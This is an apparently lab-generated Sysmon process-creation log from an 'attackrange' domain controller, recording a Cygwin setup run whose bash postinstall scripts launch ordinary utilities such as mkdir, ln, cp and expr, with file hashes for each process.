14:56:00.186{A8622C2F-5400-6078-6C0B-00000000AE01}4860C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-6B0B-00000000AE01}1496C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055122Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.178{A8622C2F-5400-6078-6B0B-00000000AE01}1496C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055111Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.170{A8622C2F-5400-6078-6A0B-00000000AE01}4832C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-690B-00000000AE01}5220C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055101Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.162{A8622C2F-5400-6078-690B-00000000AE01}5220C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055087Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.153{A8622C2F-5400-6078-680B-00000000AE01}6268C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-670B-00000000AE01}6240C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055077Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.145{A8622C2F-5400-6078-670B-00000000AE01}6240C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055066Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.138{A8622C2F-5400-6078-660B-00000000AE01}2508C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-650B-00000000AE01}5084C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055056Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.130{A8622C2F-5400-6078-650B-00000000AE01}5084C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055045Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.120{A8622C2F-5400-6078-640B-00000000AE01}4412C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-630B-00000000AE01}5964C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055035Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.111{A8622C2F-5400-6078-630B-00000000AE01}5964C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055017Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.072{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe"C:\Users\Administrator\Downloads\setup-x86_64.exe" 154100x800000000000000055005Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.057{A8622C2F-5400-6078-600B-00000000AE01}5804C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-5400-6078-5F0B-00000000AE01}5852C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054995Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.049{A8622C2F-5400-6078-5F0B-00000000AE01}5852C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-4B0B-00000000AE01}4300C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054984Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.042{A8622C2F-5400-6078-5E0B-00000000AE01}928C:\cygwin64\bin\expr.exe-----"C:\cygwin64\bin\expr.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AE850C7C3F5692C2D09DFC2B02C798B2,SHA256=E96561ECDFA070DC3C492186D1E51A0C2A4D94B1C4F4FA8715B7187F45BC9D7F,IMPHASH=BF34EBF5A6CAAB74C528530D342DA323{A8622C2F-5400-6078-5D0B-00000000AE01}5116C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054974Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.033{A8622C2F-5400-6078-5D0B-00000000AE01}5116C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-4B0B-00000000AE01}4300C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054961Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.024{A8622C2F-5400-6078-5C0B-00000000AE01}5776C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-5400-6078-5B0B-00000000AE01}4568C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054951Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.016{A8622C2F-5400-6078-5B0B-00000000AE01}4568C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-4B0B-00000000AE01}4300C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054940Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.009{A8622C2F-5400-6078-5A0B-00000000AE01}4056C:\cygwin64\bin\expr.exe-----"C:\cygwin64\bin\expr.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AE850C7C3F5692C2D09DFC2B02C798B2,SHA256=E96561ECDFA070DC3C492186D1E51A0C2A4D94B1C4F4FA8715B7187F45BC9D7F,IMPHASH=BF34EBF5A6CAAB74C528530D342DA323{A8622C2F-5400-6078-590B-00000000AE01}5832C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054930Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.000{A8622C2F-5400-6078-590B-00000000AE01}5832C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-4B0B-00000000AE01}4300C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054917Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.991{A8622C2F-53FF-6078-580B-00000000AE01}5640C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-53FF-6078-570B-00000000AE01}6064C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054907Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.984{A8622C2F-53FF-6078-570B-00000000AE01}6064C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-4B0B-00000000AE01}4300C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054896Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.976{A8622C2F-53FF-6078-560B-00000000AE01}1476C:\cygwin64\bin\expr.exe-----"C:\cygwin64\bin\expr.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AE850C7C3F5692C2D09DFC2B02C798B2,SHA256=E96561ECDFA070DC3C492186D1E51A0C2A4D94B1C4F4FA8715B7187F45BC9D7F,IMPHASH=BF34EBF5A6CAAB74C528530D342DA323{A8622C2F-53FF-6078-550B-00000000AE01}1100C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054886Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.968{A8622C2F-53FF-6078-550B-00000000AE01}1100C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-4B0B-00000000AE01}4300C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054873Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.959{A8622C2F-53FF-6078-540B-00000000AE01}6852C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-53FF-6078-530B-00000000AE01}6884C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054863Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.951{A8622C2F-53FF-6078-530B-00000000AE01}6884C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-4B0B-00000000AE01}4300C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054852Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.932{A8622C2F-53FF-6078-520B-00000000AE01}5084C:\cygwin64\bin\expr.exe-----"C:\cygwin64\bin\expr.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AE850C7C3F5692C2D09DFC2B02C798B2,SHA256=E96561ECDFA070DC3C492186D1E51A0C2A4D94B1C4F4FA8715B7187F45BC9D7F,IMPHASH=BF34EBF5A6CAAB74C528530D342DA323{A8622C2F-53FF-6078-510B-00000000AE01}4160C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054842Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.923{A8622C2F-53FF-6078-510B-00000000AE01}4160C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-4B0B-00000000AE01}4300C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054829Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.907{A8622C2F-53FF-6078-500B-00000000AE01}5828C:\cygwin64\bin\cygpath.exe-----"C:\cygwin64\bin\cygpath.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=1E43FD705AA6BC83C6A7D7F990220D26,SHA256=9D332ABE061AA831770D84F3A7AEA3A069873CFD7240B456A71E82E0E5A828DC,IMPHASH=41B7C52F77C32CD14B1D4CB1E0D93583{A8622C2F-53FF-6078-4F0B-00000000AE01}3420C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054819Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.899{A8622C2F-53FF-6078-4F0B-00000000AE01}3420C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-4B0B-00000000AE01}4300C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054806Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.885{A8622C2F-53FF-6078-4E0B-00000000AE01}6332C:\cygwin64\bin\uname.exe-----"C:\cygwin64\bin\uname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=75B3A9DE22D28DFE34FC8B0C747B1B1F,SHA256=5E34E4152BD98DB6D32A543A7812ECF543933905123FE5BF82B708B5EAC0E50D,IMPHASH=8B550AB258E8F33E9A5161733CA078D7{A8622C2F-53FF-6078-4D0B-00000000AE01}4604C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054796Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.877{A8622C2F-53FF-6078-4D0B-00000000AE01}4604C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-4B0B-00000000AE01}4300C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054778Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.837{A8622C2F-53FF-6078-4B0B-00000000AE01}4300C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe"C:\Users\Administrator\Downloads\setup-x86_64.exe" 154100x800000000000000054767Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.823{A8622C2F-53FF-6078-4A0B-00000000AE01}5664C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-53FF-6078-490B-00000000AE01}924C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054757Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.816{A8622C2F-53FF-6078-490B-00000000AE01}924C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-390B-00000000AE01}6432C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054746Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.808{A8622C2F-53FF-6078-480B-00000000AE01}7016C:\cygwin64\bin\test.exe-----"C:\cygwin64\bin\test.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F2FEC964BB161C976596CA481122950F,SHA256=1E702EE5A24F57AE2B997465CC9B2901C7E1683336793D30FAE488B02EA3B156,IMPHASH=5B5AE0321E25BBDFC3A0BB35025DC1E8{A8622C2F-53FF-6078-470B-00000000AE01}5108C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054736Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.800{A8622C2F-53FF-6078-470B-00000000AE01}5108C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-390B-00000000AE01}6432C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054725Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.792{A8622C2F-53FF-6078-460B-00000000AE01}6032C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-53FF-6078-450B-00000000AE01}5620C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054715Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.784{A8622C2F-53FF-6078-450B-00000000AE01}5620C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-390B-00000000AE01}6432C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/bash.sh" 154100x800000000000000054704Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.777{A8622C2F-53FF-6078-440B-00000000AE01}4288C:\cygwin64\bin\test.exe-----"C:\cygwin64\bin\test.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F2FEC964BB161C976596CA481122950F,SHA256=1E702EE5A24F57AE2B997465CC9B2901C7E1683336793D30FAE488B02EA3B156,IMPHASH=5B5AE0321E25BBDFC3A0BB35025DC1E8{A8622C2F-53FF-6078-430B-00000000AE01}6268C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile 